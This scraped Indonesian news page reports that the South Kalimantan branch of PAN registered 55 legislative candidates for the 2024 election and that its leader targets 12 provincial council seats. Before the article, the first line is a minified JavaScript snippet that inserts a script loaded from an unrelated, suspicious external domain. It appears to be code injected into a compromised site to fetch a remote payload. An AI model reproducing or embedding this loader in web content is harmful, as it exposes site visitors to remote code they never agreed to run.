(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PEMILU 2024

PAN Kalsel Daftar ke KPU, Ini Target Haji Muhiddin


KANALKALIMANTAN.COM, BANJARMASIN – Dewan Pimpinan Wilayah (DPW) Partai Amanat Nasional (PAN) Kalimantan Selatan resmi mendaftarkan bakal calon legislatif (Bacaleg) ke KPU Kalsel, Jumat (12/5/2023) sore.

Sebanyak 55 orang Bacaleg terbaik PAN Kalsel didaftarkan yang tersebar pada tujuh daerah pemilihan (Dapil) Kalsel tanpa acara iring-iringan.

Ketua Umum DPW PAN Kalsel HM Muhidin, pada kontestasi Pemilu 2024 didepan menargetkan perolehan kursi sebanyak 12 kursi DPRD Kalsel.

“Kami menargetkan 12 kursi DPRD Kalsel, minimal dapat kursi wakil ketua,” ucap Ketua DPW PAN yang saat ini menjabat Wakil Gubernur Kalsel.

Meskilun pada Pemilu 2019, PAN Kalsel hanya berhasil memperoleh 6 kursi DPRD Kalsel, mantan Wali Kota Banjarmasin tetap optimis bisa mencapai target tersebut.

Baca juga: Lelaki Tak Bernyawa Berkalung Logam dan Peluit Mengapung di Sungai Barito, Polisi Cari Identitas Mr X

Muhidin merincikan jika target Dapil 1 Kota Banjarmasin harus mendapatkan sedikitnya 3 kursi, Dapil 6 Kotabaru dan Tanah Bumbu juga ditargetkan 3 kursi.

“Kalau Dapil Batola target 1 kursi, dan Dapil lainnya minimal 1 kursi,” ucap Muhidin usai menyerahkan berkas pendaftaran di KPU Kalsel.

Termasuk menurutnya, pihaknya menargetkan di daerah Bacaleg PAN bisa meraih kembali kursi Ketua DPRD Kota Banjarmasin seperti Pemilu 2019 lalu.

Lanjut Muhidin, berkas pendaftaran mereka sudah dinyatakan lengkap oleh KPU Kalsel. Menurutnya, keterwakilan Bacaleg perempuan yang didaftarkan DPW PAN juga melebihi dari 30%.

“Dari 55 bacaleg, perempuannya ada 21,” ungkap Muhidin.

Terkait komposisi Bacaleg yang didaftarkan lada Pemilu 2024 ini Muhidin mengungkapkan tidak banyak mengalami perubahan, termasuk pihaknya tetap mempertahankan petahana bacaleg PAN Kalsel untuk maju.

Kedepan, dirinya mendorong Bacaleg untuk turun langsung ke masyarakat

“Setelah ini kami tetap turun ke bawah, siapa yang ingin ikut dengan PAN harus turun,” pungkasnya.  (Kanalkalimantan.com/rizki)

Reporter: rizki
Editor: bie


Al Ghifari

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

7 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

7 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

7 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

8 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

8 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

8 jam ago

This website uses cookies.